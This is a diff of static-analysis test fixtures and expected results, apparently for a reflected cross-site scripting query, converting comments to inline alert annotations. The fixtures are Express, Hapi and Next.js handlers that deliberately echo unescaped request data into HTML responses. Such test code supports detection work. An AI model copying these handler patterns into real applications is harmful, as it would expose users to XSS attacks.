tst2.js:21:14:21:14 | p | Cross-site scripting vulnerability due to a $@. | tst2.js:14:9:14:9 | p | user-provided value | -| tst2.js:36:12:36:12 | p | tst2.js:30:9:30:9 | p | tst2.js:36:12:36:12 | p | Cross-site scripting vulnerability due to a $@. | tst2.js:30:9:30:9 | p | user-provided value | -| tst2.js:37:12:37:18 | other.p | tst2.js:30:9:30:9 | p | tst2.js:37:12:37:18 | other.p | Cross-site scripting vulnerability due to a $@. | tst2.js:30:9:30:9 | p | user-provided value | -| tst2.js:51:12:51:17 | unsafe | tst2.js:43:9:43:9 | p | tst2.js:51:12:51:17 | unsafe | Cross-site scripting vulnerability due to a $@. | tst2.js:43:9:43:9 | p | user-provided value | -| tst2.js:63:12:63:12 | p | tst2.js:57:9:57:9 | p | tst2.js:63:12:63:12 | p | Cross-site scripting vulnerability due to a $@. | tst2.js:57:9:57:9 | p | user-provided value | -| tst2.js:64:12:64:18 | other.p | tst2.js:57:9:57:9 | p | tst2.js:64:12:64:18 | other.p | Cross-site scripting vulnerability due to a $@. | tst2.js:57:9:57:9 | p | user-provided value | -| tst2.js:75:12:75:12 | p | tst2.js:69:9:69:9 | p | tst2.js:75:12:75:12 | p | Cross-site scripting vulnerability due to a $@. | tst2.js:69:9:69:9 | p | user-provided value | -| tst2.js:76:12:76:18 | other.p | tst2.js:69:9:69:9 | p | tst2.js:76:12:76:18 | other.p | Cross-site scripting vulnerability due to a $@. | tst2.js:69:9:69:9 | p | user-provided value | -| tst2.js:88:12:88:12 | p | tst2.js:82:9:82:9 | p | tst2.js:88:12:88:12 | p | Cross-site scripting vulnerability due to a $@. | tst2.js:82:9:82:9 | p | user-provided value | -| tst2.js:89:12:89:18 | other.p | tst2.js:82:9:82:9 | p | tst2.js:89:12:89:18 | other.p | Cross-site scripting vulnerability due to a $@. | tst2.js:82:9:82:9 | p | user-provided value | -| tst3.js:6:12:6:12 | p | tst3.js:5:9:5:9 | p | tst3.js:6:12:6:12 | p | Cross-site scripting vulnerability due to a $@. | tst3.js:5:9:5:9 | p | user-provided value | -| tst3.js:12:12:12:15 | code | tst3.js:11:32:11:39 | reg.body | tst3.js:12:12:12:15 | code | Cross-site scripting vulnerability due to a $@. | tst3.js:11:32:11:39 | reg.body | user-provided value | diff --git a/javascript/ql/test/query-tests/Security/CWE-079/ReflectedXss/ReflectedXss.js b/javascript/ql/test/query-tests/Security/CWE-079/ReflectedXss/ReflectedXss.js index dee88dd177bc..343e27b3fce5 100644 --- a/javascript/ql/test/query-tests/Security/CWE-079/ReflectedXss/ReflectedXss.js +++ b/javascript/ql/test/query-tests/Security/CWE-079/ReflectedXss/ReflectedXss.js @@ -4,8 +4,7 @@ var app = express(); app.get('/user/:id', function(req, res) { if (!isValidUserId(req.params.id)) { - // BAD: a request parameter is incorporated without validation into the response - res.send("Unknown user: " + req.params.id); + res.send("Unknown user: " + req.params.id); // $ Alert - a request parameter is incorporated without validation into the response moreBadStuff(req.params, res); } else { // TODO: do something exciting @@ -14,32 +13,32 @@ app.get('/user/:id', function(req, res) { }); function moreBadStuff(params, res) { - res.send("Unknown user: " + params.id); // NOT OK + res.send("Unknown user: " + params.id); // $ Alert } var marked = require("marked"); app.get('/user/:id', function(req, res) { - res.send(req.body); // NOT OK - res.send(marked(req.body)); // NOT OK + res.send(req.body); // $ Alert + res.send(marked(req.body)); // $ Alert }); var table = require('markdown-table') app.get('/user/:id', function(req, res) { - res.send(req.body); // NOT OK + res.send(req.body); // $ Alert var mytable = table([ ['Name', 'Content'], - ['body', req.body] + ['body', req.body] // $ Source ]); - res.send(mytable); // NOT OK + res.send(mytable); // $ Alert }); var showdown = require('showdown'); var converter = new showdown.Converter(); app.get('/user/:id', function(req, res) { - res.send(req.body); // NOT OK - res.send(converter.makeHtml(req.body)); // NOT OK + res.send(req.body); // $ Alert + res.send(converter.makeHtml(req.body)); // $ Alert }); var unified = require('unified'); @@ -53,7 +52,7 @@ var sanitize = require("rehype-sanitize"); const { resetExtensions } = require('showdown'); app.get('/user/:id', function (req, res) { - res.send(req.body); // NOT OK + res.send(req.body); // $ Alert unified() .use(markdown) @@ -61,18 +60,18 @@ app.get('/user/:id', function (req, res) { .use(doc, { title: '👋🌍' }) .use(format) .use(html) - .process(req.body, function (err, file) { - res.send(file); // NOT OK + .process(req.body, function (err, file) { // $ Source + res.send(file); // $ Alert }); - res.send(remark().processSync(req.body).toString()); // NOT OK + res.send(remark().processSync(req.body).toString()); // $ Alert - res.send(remark().use(sanitize).processSync(req.body).toString()); // OK + res.send(remark().use(sanitize).processSync(req.body).toString()); - res.send(unified().use(markdown).processSync(req.body).toString); // NOT OK + res.send(unified().use(markdown).processSync(req.body).toString); // $ Alert - remark().process(req.body, (e, f) => { - res.send(f); // NOT OK + remark().process(req.body, (e, f) => { // $ Source + res.send(f); // $ Alert }) }); @@ -80,9 +79,9 @@ import snarkdown from 'snarkdown'; var snarkdown2 = require("snarkdown"); app.get('/user/:id', function (req, res) { - res.send(req.body); // NOT OK - res.send(snarkdown(req.body)); // NOT OK - res.send(snarkdown2(req.body)); // NOT OK + res.send(req.body); // $ Alert + res.send(snarkdown(req.body)); // $ Alert + res.send(snarkdown2(req.body)); // $ Alert }); const markdownIt = require('markdown-it')({ @@ -94,32 +93,32 @@ const markdownIt3 = require('markdown-it')({html: true}) .use(require('markdown-it-highlightjs')); app.get('/user/:id', function (req, res) { - res.send(req.body); // NOT OK - res.send(markdownIt.render(req.body)); // NOT OK + res.send(req.body); // $ Alert + res.send(markdownIt.render(req.body)); // $ Alert res.send(markdownIt2.render(req.body)); // OK - no html - res.send(markdownIt3.render(req.body)); // NOT OK + res.send(markdownIt3.render(req.body)); // $ Alert - res.send(markdownIt.use(require('markdown-it-sanitizer')).render(req.body)); // OK - HTML is sanitized. - res.send(markdownIt.use(require('markdown-it-abbr')).use(unknown).render(req.body)); // NOT OK + res.send(markdownIt.use(require('markdown-it-sanitizer')).render(req.body)); // OK - HTML is sanitized. + res.send(markdownIt.use(require('markdown-it-abbr')).use(unknown).render(req.body)); // $ Alert }); var Hapi = require('hapi'); var hapi = new Hapi.Server(); hapi.route({ handler: function (request){ - return request.query.p; // NOT OK + return request.query.p; // $ Alert }}); app.get("invalid/keys/:id", async (req, res) => { - const { keys: queryKeys } = req.query; + const { keys: queryKeys } = req.query; // $ Source const paramKeys = req.params; - const keys = queryKeys || paramKeys?.keys; + const keys = queryKeys || paramKeys?.keys; // $ Source const keyArray = typeof keys === 'string' ? [keys] : keys; const invalidKeys = keyArray.filter(key => !whitelist.includes(key)); if (invalidKeys.length) { - res.status(400).send(`${invalidKeys.join(', ')} not in whitelist`); + res.status(400).send(`${invalidKeys.join(', ')} not in whitelist`); // $ Alert return; } }); diff --git a/javascript/ql/test/query-tests/Security/CWE-079/ReflectedXss/ReflectedXss.qlref b/javascript/ql/test/query-tests/Security/CWE-079/ReflectedXss/ReflectedXss.qlref index e0efe1024162..9cd0122e556e 100644 --- a/javascript/ql/test/query-tests/Security/CWE-079/ReflectedXss/ReflectedXss.qlref +++ b/javascript/ql/test/query-tests/Security/CWE-079/ReflectedXss/ReflectedXss.qlref @@ -1 +1,2 @@ -Security/CWE-079/ReflectedXss.ql +query: Security/CWE-079/ReflectedXss.ql +postprocess: utils/test/InlineExpectationsTestQuery.ql diff --git a/javascript/ql/test/query-tests/Security/CWE-079/ReflectedXss/ReflectedXssContentTypes.js b/javascript/ql/test/query-tests/Security/CWE-079/ReflectedXss/ReflectedXssContentTypes.js index 64acfded0a63..cf89f45b9692 100644 --- a/javascript/ql/test/query-tests/Security/CWE-079/ReflectedXss/ReflectedXssContentTypes.js +++ b/javascript/ql/test/query-tests/Security/CWE-079/ReflectedXss/ReflectedXssContentTypes.js @@ -7,7 +7,7 @@ app.get('/user/:id', function (req, res) { res.send("FOO: " + req.params.id); // OK - content type is plain text } else { res.set('Content-Type', 'text/html'); - res.send("FOO: " + req.params.id); // NOT OK - content type is HTML. + res.send("FOO: " + req.params.id); // $ Alert - content type is HTML. } }); @@ -17,7 +17,7 @@ app.get('/user/:id', function (req, res) { res.send("FOO: " + req.params.id); // OK - content type is JSON } else { res.writeHead(404); - res.send("FOO: " + req.params.id); // NOT OK - content type is not set. + res.send("FOO: " + req.params.id); // $ Alert - content type is not set. } }); @@ -36,10 +36,10 @@ app.get('/user/:id', function (req, res) { app.get('/user/:id', function (req, res) { if (err) { res.statusCode = 404; - res.end("FOO: " + req.params.id); // NOT OK + res.end("FOO: " + req.params.id); // $ Alert } else { res.setHeader('Content-Type', 'text/plain;charset=utf8'); - res.end("FOO: " + req.params.id); // OK + res.end("FOO: " + req.params.id); } }); @@ -50,10 +50,10 @@ function textContentType() { app.get('/user/:id', function (req, res) { if (err) { res.header({'Content-Type': textContentType()}); - res.end("FOO: " + req.params.id); // OK + res.end("FOO: " + req.params.id); } else { res.setHeader('Content-Type', 'text/plain;charset=utf8'); - res.end("FOO: " + req.params.id); // OK + res.end("FOO: " + req.params.id); } }); @@ -67,13 +67,13 @@ app.get('/user/:id', function (req, res) { somethingMore(); while(Math.random()) {}; res.writeHead(404); - res.send("FOO: " + req.params.id); // NOT OK - content type is not set. + res.send("FOO: " + req.params.id); // $ Alert - content type is not set. }); app.get('/user/:id', function (req, res) { res.header({'Content-Type': textContentType()}); myFancyFunction(() => { - res.send("FOO: " + req.params.id); // OK + res.send("FOO: " + req.params.id); }); - res.end("FOO: " + req.params.id); // OK + res.end("FOO: " + req.params.id); }); \ No newline at end of file diff --git a/javascript/ql/test/query-tests/Security/CWE-079/ReflectedXss/ReflectedXssGood.js b/javascript/ql/test/query-tests/Security/CWE-079/ReflectedXss/ReflectedXssGood.js index c6635459f42f..a92226bff122 100644 --- a/javascript/ql/test/query-tests/Security/CWE-079/ReflectedXss/ReflectedXssGood.js +++ b/javascript/ql/test/query-tests/Security/CWE-079/ReflectedXss/ReflectedXssGood.js @@ -5,7 +5,7 @@ var app = express(); app.get('/user/:id', function(req, res) { if (!isValidUserId(req.params.id)) - // GOOD: request parameter is sanitized before incorporating it into the response + // OK - request parameter is sanitized before incorporating it into the response res.send("Unknown user: " + escape(req.params.id)); else // TODO: do something exciting @@ -15,13 +15,13 @@ app.get('/user/:id', function(req, res) { app.get('/user/:id', function(req, res) { if (!isValidUserId(req.params.id)) - // GOOD: templating prevents XSS + // OK - templating prevents XSS res.render(invalidUserIdTemplate, { id: req.params.id }); }); app.get('/user/:id', function(req, res) { if (!isValidUserId(req.params.id)) { - // GOOD: response content type set to text + // OK - response content type set to text res.set('Content-Type', 'text/plain'); res.send("Unknown user: " + req.params.id); } else @@ -35,7 +35,7 @@ function textContentType() { app.get('/user/:id', function(req, res) { if (!isValidUserId(req.params.id)) { - // GOOD: response content type set to text + // OK - response content type set to text res.set('Content-Type', textContentType()); res.send("Unknown user: " + req.params.id); } else @@ -53,7 +53,7 @@ app.get('/echo', function(req, res) { app.get('/user/:id', function(req, res) { const url = req.params.id; if (!/["'&<>]/.exec(url)) { - res.send(url); // OK + res.send(url); } }); @@ -66,7 +66,7 @@ function escapeHtml1 (str) { app.get('/user/:id', function(req, res) { const url = req.params.id; - res.send(escapeHtml1(url)); // OK + res.send(escapeHtml1(url)); }); const matchHtmlRegExp = /["'&<>]/; @@ -82,6 +82,6 @@ function escapeHtml2 (string) { app.get('/user/:id', function(req, res) { const url = req.params.id; - res.send(escapeHtml2(url)); // OK + res.send(escapeHtml2(url)); }); diff --git a/javascript/ql/test/query-tests/Security/CWE-079/ReflectedXss/ReflectedXssGood3.js b/javascript/ql/test/query-tests/Security/CWE-079/ReflectedXss/ReflectedXssGood3.js index 2217ab783ac7..996f093aa15c 100644 --- a/javascript/ql/test/query-tests/Security/CWE-079/ReflectedXss/ReflectedXssGood3.js +++ b/javascript/ql/test/query-tests/Security/CWE-079/ReflectedXss/ReflectedXssGood3.js @@ -132,11 +132,11 @@ function escapeHtml4(s) { } app.get('/user/:id', function (req, res) { - const url = req.params.id; + const url = req.params.id; // $ Source - res.send(escapeHtml1(url)); // OK - res.send(escapeHtml2(url)); // OK - res.send(escapeHtml3(url)); // OK - but FP [INCONSISTENCY] - res.send(escapeHtml4(url)); // OK + res.send(escapeHtml1(url)); + res.send(escapeHtml2(url)); + res.send(escapeHtml3(url)); // $ SPURIOUS: Alert - FP + res.send(escapeHtml4(url)); }); diff --git a/javascript/ql/test/query-tests/Security/CWE-079/ReflectedXss/ReflectedXssWithCustomSanitizer.expected b/javascript/ql/test/query-tests/Security/CWE-079/ReflectedXss/ReflectedXssWithCustomSanitizer.expected index a367f07307a5..fb0748b3acdd 100644 --- a/javascript/ql/test/query-tests/Security/CWE-079/ReflectedXss/ReflectedXssWithCustomSanitizer.expected +++ b/javascript/ql/test/query-tests/Security/CWE-079/ReflectedXss/ReflectedXssWithCustomSanitizer.expected @@ -1,26 +1,26 @@ -| ReflectedXss.js:8:14:8:45 | "Unknow ... rams.id | Cross-site scripting vulnerability due to $@. | ReflectedXss.js:8:33:8:45 | req.params.id | user-provided value | -| ReflectedXss.js:17:12:17:39 | "Unknow ... rams.id | Cross-site scripting vulnerability due to $@. | ReflectedXss.js:17:31:17:39 | params.id | user-provided value | -| ReflectedXss.js:22:12:22:19 | req.body | Cross-site scripting vulnerability due to $@. | ReflectedXss.js:22:12:22:19 | req.body | user-provided value | -| ReflectedXss.js:23:12:23:27 | marked(req.body) | Cross-site scripting vulnerability due to $@. | ReflectedXss.js:23:19:23:26 | req.body | user-provided value | -| ReflectedXss.js:29:12:29:19 | req.body | Cross-site scripting vulnerability due to $@. | ReflectedXss.js:29:12:29:19 | req.body | user-provided value | -| ReflectedXss.js:34:12:34:18 | mytable | Cross-site scripting vulnerability due to $@. | ReflectedXss.js:32:14:32:21 | req.body | user-provided value | -| ReflectedXss.js:41:12:41:19 | req.body | Cross-site scripting vulnerability due to $@. | ReflectedXss.js:41:12:41:19 | req.body | user-provided value | -| ReflectedXss.js:42:12:42:39 | convert ... q.body) | Cross-site scripting vulnerability due to $@. | ReflectedXss.js:42:31:42:38 | req.body | user-provided value | -| ReflectedXss.js:56:12:56:19 | req.body | Cross-site scripting vulnerability due to $@. | ReflectedXss.js:56:12:56:19 | req.body | user-provided value | -| ReflectedXss.js:65:16:65:19 | file | Cross-site scripting vulnerability due to $@. | ReflectedXss.js:64:14:64:21 | req.body | user-provided value | -| ReflectedXss.js:68:12:68:52 | remark( ... tring() | Cross-site scripting vulnerability due to $@. | ReflectedXss.js:68:33:68:40 | req.body | user-provided value | -| ReflectedXss.js:72:12:72:65 | unified ... oString | Cross-site scripting vulnerability due to $@. | ReflectedXss.js:72:48:72:55 | req.body | user-provided value | -| ReflectedXss.js:75:14:75:14 | f | Cross-site scripting vulnerability due to $@. | ReflectedXss.js:74:20:74:27 | req.body | user-provided value | -| ReflectedXss.js:83:12:83:19 | req.body | Cross-site scripting vulnerability due to $@. | ReflectedXss.js:83:12:83:19 | req.body | user-provided value | -| ReflectedXss.js:84:12:84:30 | snarkdown(req.body) | Cross-site scripting vulnerability due to $@. | ReflectedXss.js:84:22:84:29 | req.body | user-provided value | -| ReflectedXss.js:85:12:85:31 | snarkdown2(req.body) | Cross-site scripting vulnerability due to $@. | ReflectedXss.js:85:23:85:30 | req.body | user-provided value | -| ReflectedXss.js:97:12:97:19 | req.body | Cross-site scripting vulnerability due to $@. | ReflectedXss.js:97:12:97:19 | req.body | user-provided value | -| ReflectedXss.js:98:12:98:38 | markdow ... q.body) | Cross-site scripting vulnerability due to $@. | ReflectedXss.js:98:30:98:37 | req.body | user-provided value | -| ReflectedXss.js:100:12:100:39 | markdow ... q.body) | Cross-site scripting vulnerability due to $@. | ReflectedXss.js:100:31:100:38 | req.body | user-provided value | -| ReflectedXss.js:103:12:103:84 | markdow ... q.body) | Cross-site scripting vulnerability due to $@. | ReflectedXss.js:103:76:103:83 | req.body | user-provided value | -| ReflectedXss.js:110:16:110:30 | request.query.p | Cross-site scripting vulnerability due to $@. | ReflectedXss.js:110:16:110:30 | request.query.p | user-provided value | -| ReflectedXss.js:122:30:122:73 | `${inva ... telist` | Cross-site scripting vulnerability due to $@. | ReflectedXss.js:114:13:114:27 | keys: queryKeys | user-provided value | -| ReflectedXss.js:122:30:122:73 | `${inva ... telist` | Cross-site scripting vulnerability due to $@. | ReflectedXss.js:116:31:116:45 | paramKeys?.keys | user-provided value | +| ReflectedXss.js:7:14:7:45 | "Unknow ... rams.id | Cross-site scripting vulnerability due to $@. | ReflectedXss.js:7:33:7:45 | req.params.id | user-provided value | +| ReflectedXss.js:16:12:16:39 | "Unknow ... rams.id | Cross-site scripting vulnerability due to $@. | ReflectedXss.js:16:31:16:39 | params.id | user-provided value | +| ReflectedXss.js:21:12:21:19 | req.body | Cross-site scripting vulnerability due to $@. | ReflectedXss.js:21:12:21:19 | req.body | user-provided value | +| ReflectedXss.js:22:12:22:27 | marked(req.body) | Cross-site scripting vulnerability due to $@. | ReflectedXss.js:22:19:22:26 | req.body | user-provided value | +| ReflectedXss.js:28:12:28:19 | req.body | Cross-site scripting vulnerability due to $@. | ReflectedXss.js:28:12:28:19 | req.body | user-provided value | +| ReflectedXss.js:33:12:33:18 | mytable | Cross-site scripting vulnerability due to $@. | ReflectedXss.js:31:14:31:21 | req.body | user-provided value | +| ReflectedXss.js:40:12:40:19 | req.body | Cross-site scripting vulnerability due to $@. | ReflectedXss.js:40:12:40:19 | req.body | user-provided value | +| ReflectedXss.js:41:12:41:39 | convert ... q.body) | Cross-site scripting vulnerability due to $@. | ReflectedXss.js:41:31:41:38 | req.body | user-provided value | +| ReflectedXss.js:55:12:55:19 | req.body | Cross-site scripting vulnerability due to $@. | ReflectedXss.js:55:12:55:19 | req.body | user-provided value | +| ReflectedXss.js:64:16:64:19 | file | Cross-site scripting vulnerability due to $@. | ReflectedXss.js:63:14:63:21 | req.body | user-provided value | +| ReflectedXss.js:67:12:67:52 | remark( ... tring() | Cross-site scripting vulnerability due to $@. | ReflectedXss.js:67:33:67:40 | req.body | user-provided value | +| ReflectedXss.js:71:12:71:65 | unified ... oString | Cross-site scripting vulnerability due to $@. | ReflectedXss.js:71:48:71:55 | req.body | user-provided value | +| ReflectedXss.js:74:14:74:14 | f | Cross-site scripting vulnerability due to $@. | ReflectedXss.js:73:20:73:27 | req.body | user-provided value | +| ReflectedXss.js:82:12:82:19 | req.body | Cross-site scripting vulnerability due to $@. | ReflectedXss.js:82:12:82:19 | req.body | user-provided value | +| ReflectedXss.js:83:12:83:30 | snarkdown(req.body) | Cross-site scripting vulnerability due to $@. | ReflectedXss.js:83:22:83:29 | req.body | user-provided value | +| ReflectedXss.js:84:12:84:31 | snarkdown2(req.body) | Cross-site scripting vulnerability due to $@. | ReflectedXss.js:84:23:84:30 | req.body | user-provided value | +| ReflectedXss.js:96:12:96:19 | req.body | Cross-site scripting vulnerability due to $@. | ReflectedXss.js:96:12:96:19 | req.body | user-provided value | +| ReflectedXss.js:97:12:97:38 | markdow ... q.body) | Cross-site scripting vulnerability due to $@. | ReflectedXss.js:97:30:97:37 | req.body | user-provided value | +| ReflectedXss.js:99:12:99:39 | markdow ... q.body) | Cross-site scripting vulnerability due to $@. | ReflectedXss.js:99:31:99:38 | req.body | user-provided value | +| ReflectedXss.js:102:12:102:84 | markdow ... q.body) | Cross-site scripting vulnerability due to $@. | ReflectedXss.js:102:76:102:83 | req.body | user-provided value | +| ReflectedXss.js:109:16:109:30 | request.query.p | Cross-site scripting vulnerability due to $@. | ReflectedXss.js:109:16:109:30 | request.query.p | user-provided value | +| ReflectedXss.js:121:30:121:73 | `${inva ... telist` | Cross-site scripting vulnerability due to $@. | ReflectedXss.js:113:13:113:27 | keys: queryKeys | user-provided value | +| ReflectedXss.js:121:30:121:73 | `${inva ... telist` | Cross-site scripting vulnerability due to $@. | ReflectedXss.js:115:31:115:45 | paramKeys?.keys | user-provided value | | ReflectedXssContentTypes.js:10:14:10:36 | "FOO: " ... rams.id | Cross-site scripting vulnerability due to $@. | ReflectedXssContentTypes.js:10:24:10:36 | req.params.id | user-provided value | | ReflectedXssContentTypes.js:20:14:20:36 | "FOO: " ... rams.id | Cross-site scripting vulnerability due to $@. | ReflectedXssContentTypes.js:20:24:20:36 | req.params.id | user-provided value | | ReflectedXssContentTypes.js:39:13:39:35 | "FOO: " ... rams.id | Cross-site scripting vulnerability due to $@. | ReflectedXssContentTypes.js:39:23:39:35 | req.params.id | user-provided value | diff --git a/javascript/ql/test/query-tests/Security/CWE-079/ReflectedXss/cookies.js b/javascript/ql/test/query-tests/Security/CWE-079/ReflectedXss/cookies.js index c30ab48a511d..3fba93d3b4a7 100644 --- a/javascript/ql/test/query-tests/Security/CWE-079/ReflectedXss/cookies.js +++ b/javascript/ql/test/query-tests/Security/CWE-079/ReflectedXss/cookies.js @@ -5,6 +5,6 @@ var app = express(); app.use(cookieParser()); app.get('/cookie/:name', function(req, res) { - // OK + res.send("Here, have a cookie: " + req.cookies[req.params.name]); }); diff --git a/javascript/ql/test/query-tests/Security/CWE-079/ReflectedXss/etherpad.js b/javascript/ql/test/query-tests/Security/CWE-079/ReflectedXss/etherpad.js index e0eed4a17d67..8377357a0c4c 100644 --- a/javascript/ql/test/query-tests/Security/CWE-079/ReflectedXss/etherpad.js +++ b/javascript/ql/test/query-tests/Security/CWE-079/ReflectedXss/etherpad.js @@ -6,7 +6,7 @@ app.get("/some/path", (req, res) => { let response = "Hello, world!"; if(req.query.jsonp && isVarName(req.query.jsonp)) - response = req.query.jsonp + "(" + response + ")"; + response = req.query.jsonp + "(" + response + ")"; // $ Source - res.send(response); + res.send(response); // $ Alert }); diff --git a/javascript/ql/test/query-tests/Security/CWE-079/ReflectedXss/formatting.js b/javascript/ql/test/query-tests/Security/CWE-079/ReflectedXss/formatting.js index 45ad3a94920c..a359780e57b0 100644 --- a/javascript/ql/test/query-tests/Security/CWE-079/ReflectedXss/formatting.js +++ b/javascript/ql/test/query-tests/Security/CWE-079/ReflectedXss/formatting.js @@ -1,8 +1,8 @@ var express = require('express'); express().get('/user/', function(req, res) { - var evil = req.query.evil; - res.send(console.log("
    %s
    ", evil)); // OK (returns undefined) - res.send(util.format("
    %s
    ", evil)); // NOT OK - res.send(require("printf")("
    %s
    ", evil)); // NOT OK + var evil = req.query.evil; // $ Source + res.send(console.log("
    %s
    ", evil)); // OK - returns undefined + res.send(util.format("
    %s
    ", evil)); // $ Alert + res.send(require("printf")("
    %s
    ", evil)); // $ Alert }); diff --git a/javascript/ql/test/query-tests/Security/CWE-079/ReflectedXss/live-server.js b/javascript/ql/test/query-tests/Security/CWE-079/ReflectedXss/live-server.js index aed560fc0767..9e03025792d0 100644 --- a/javascript/ql/test/query-tests/Security/CWE-079/ReflectedXss/live-server.js +++ b/javascript/ql/test/query-tests/Security/CWE-079/ReflectedXss/live-server.js @@ -1,15 +1,15 @@ var liveServer = require("live-server"); const middleware = [function(req, res, next) { - const tainted = req.url; + const tainted = req.url; // $ Source - res.end(`${tainted}`); // NOT OK + res.end(`${tainted}`); // $ Alert }]; middleware.push(function(req, res, next) { - const tainted = req.url; + const tainted = req.url; // $ Source - res.end(`${tainted}`); // NOT OK + res.end(`${tainted}`); // $ Alert }); var params = { diff --git a/javascript/ql/test/query-tests/Security/CWE-079/ReflectedXss/pages/Next.jsx b/javascript/ql/test/query-tests/Security/CWE-079/ReflectedXss/pages/Next.jsx index 9bb3cc46e963..d6c2232e9571 100644 --- a/javascript/ql/test/query-tests/Security/CWE-079/ReflectedXss/pages/Next.jsx +++ b/javascript/ql/test/query-tests/Security/CWE-079/ReflectedXss/pages/Next.jsx @@ -5,14 +5,14 @@ export default function Post() { Post.getInitialProps = async (ctx) => { const req = ctx.req; const res = ctx.res; - res.end(req.url); + res.end(req.url); // $ Alert return {} } export async function getServerSideProps(ctx) { const req = ctx.req; const res = ctx.res; - res.end(req.url); + res.end(req.url); // $ Alert return { props: {} } diff --git a/javascript/ql/test/query-tests/Security/CWE-079/ReflectedXss/pages/api/myapi.js b/javascript/ql/test/query-tests/Security/CWE-079/ReflectedXss/pages/api/myapi.js index 7a0c18245245..6224aea72622 100644 --- a/javascript/ql/test/query-tests/Security/CWE-079/ReflectedXss/pages/api/myapi.js +++ b/javascript/ql/test/query-tests/Security/CWE-079/ReflectedXss/pages/api/myapi.js @@ -1,3 +1,3 @@ export default function handler(req, res) { - res.send(req.url); + res.send(req.url); // $ Alert } \ No newline at end of file diff --git a/javascript/ql/test/query-tests/Security/CWE-079/ReflectedXss/partial.js b/javascript/ql/test/query-tests/Security/CWE-079/ReflectedXss/partial.js index 4b2edd4e4faf..a0f2120b2c4f 100644 --- a/javascript/ql/test/query-tests/Security/CWE-079/ReflectedXss/partial.js +++ b/javascript/ql/test/query-tests/Security/CWE-079/ReflectedXss/partial.js @@ -7,37 +7,37 @@ let app = express(); app.get("/some/path", (req, res) => { function sendResponse(x, y) { - res.send(x + y); // NOT OK + res.send(x + y); // $ Alert } - let callback = sendResponse.bind(null, req.url); + let callback = sendResponse.bind(null, req.url); // $ Source [1, 2, 3].forEach(callback); }); app.get("/underscore", (req, res) => { function sendResponse(x, y) { - res.send(x + y); // NOT OK + res.send(x + y); // $ Alert } - let callback = underscore.partial(sendResponse, req.url); + let callback = underscore.partial(sendResponse, req.url); // $ Source [1, 2, 3].forEach(callback); }); app.get("/lodash", (req, res) => { function sendResponse(x, y) { - res.send(x + y); // NOT OK + res.send(x + y); // $ Alert } - let callback = lodash.partial(sendResponse, req.url); + let callback = lodash.partial(sendResponse, req.url); // $ Source [1, 2, 3].forEach(callback); }); app.get("/ramda", (req, res) => { function sendResponse(x, y) { - res.send(x + y); // NOT OK + res.send(x + y); // $ Alert } - let callback = R.partial(sendResponse, [req.url]); + let callback = R.partial(sendResponse, [req.url]); // $ Source [1, 2, 3].forEach(callback); }); @@ -49,7 +49,7 @@ app.get("/return", (req, res) => { let callback = getFirst.bind(null, req.url); res.send(callback); // OK - the callback itself is not tainted - res.send(callback()); // NOT OK - but not currently detected [INCONSISTENCY] + res.send(callback()); // $ MISSING: Alert - not currently detected res.send(getFirst("Hello")); // OK - argument is not tainted from this call site }); diff --git a/javascript/ql/test/query-tests/Security/CWE-079/ReflectedXss/promises.js b/javascript/ql/test/query-tests/Security/CWE-079/ReflectedXss/promises.js index d48ec23af5f1..41eb48b68d65 100644 --- a/javascript/ql/test/query-tests/Security/CWE-079/ReflectedXss/promises.js +++ b/javascript/ql/test/query-tests/Security/CWE-079/ReflectedXss/promises.js @@ -2,10 +2,10 @@ let express = require('express'); let app = express(); app.get("/some/path", (req, res) => { - new Promise((resolve, reject) => resolve(req.query.data)) - .then(x => res.send(x)); // NOT OK + new Promise((resolve, reject) => resolve(req.query.data)) // $ Source + .then(x => res.send(x)); // $ Alert new Promise((resolve, reject) => resolve(req.query.data)) .then(x => escapeHtml(x)) - .then(x => res.send(x)); // OK + .then(x => res.send(x)); }); diff --git a/javascript/ql/test/query-tests/Security/CWE-079/ReflectedXss/tst2.js b/javascript/ql/test/query-tests/Security/CWE-079/ReflectedXss/tst2.js index 60399a9b63d6..660743338848 100644 --- a/javascript/ql/test/query-tests/Security/CWE-079/ReflectedXss/tst2.js +++ b/javascript/ql/test/query-tests/Security/CWE-079/ReflectedXss/tst2.js @@ -3,88 +3,88 @@ var express = require('express'); var app = express(); app.get('/user/:id', function(req, res) { - let { p, q: r } = req.params; - res.send(p); // NOT OK - res.send(r); // NOT OK + let { p, q: r } = req.params; // $ Source + res.send(p); // $ Alert + res.send(r); // $ Alert }); const aKnownValue = "foo"; app.get('/bar', function(req, res) { - let { p } = req.params; + let { p } = req.params; // $ Source if (p == aKnownValue) - res.send(p); // OK - res.send(p); // NOT OK + res.send(p); + res.send(p); // $ Alert if (p != aKnownValue) - res.send(p); // NOT OK + res.send(p); // $ Alert else - res.send(p); // OK + res.send(p); }); const clone = require('clone'); app.get('/baz', function(req, res) { - let { p } = req.params; + let { p } = req.params; // $ Source var obj = {}; obj.p = p; var other = clone(obj); - res.send(p); // NOT OK - res.send(other.p); // NOT OK + res.send(p); // $ Alert + res.send(other.p); // $ Alert }); const serializeJavaScript = require('serialize-javascript'); app.get('/baz', function(req, res) { - let { p } = req.params; + let { p } = req.params; // $ Source var serialized = serializeJavaScript(p); - res.send(serialized); // OK + res.send(serialized); var unsafe = serializeJavaScript(p, {unsafe: true}); - res.send(unsafe); // NOT OK + res.send(unsafe); // $ Alert }); const fclone = require('fclone'); app.get('/baz', function(req, res) { - let { p } = req.params; + let { p } = req.params; // $ Source var obj = {}; obj.p = p; var other = fclone(obj); - res.send(p); // NOT OK - res.send(other.p); // NOT OK + res.send(p); // $ Alert + res.send(other.p); // $ Alert }); const jc = require('json-cycle'); app.get('/baz', function(req, res) { - let { p } = req.params; + let { p } = req.params; // $ Source var obj = {}; obj.p = p; var other = jc.retrocycle(jc.decycle(obj)); - res.send(p); // NOT OK - res.send(other.p); // NOT OK + res.send(p); // $ Alert + res.send(other.p); // $ Alert }); const sortKeys = require('sort-keys'); app.get('/baz', function(req, res) { - let { p } = req.params; + let { p } = req.params; // $ Source var obj = {}; obj.p = p; var other = sortKeys(obj); - res.send(p); // NOT OK - res.send(other.p); // NOT OK + res.send(p); // $ Alert + res.send(other.p); // $ Alert }); \ No newline at end of file diff --git a/javascript/ql/test/query-tests/Security/CWE-079/ReflectedXss/tst3.js b/javascript/ql/test/query-tests/Security/CWE-079/ReflectedXss/tst3.js index c7d0fd91a4a0..5419959d61ec 100644 --- a/javascript/ql/test/query-tests/Security/CWE-079/ReflectedXss/tst3.js +++ b/javascript/ql/test/query-tests/Security/CWE-079/ReflectedXss/tst3.js @@ -2,12 +2,12 @@ var express = require('express'); var app = express(); 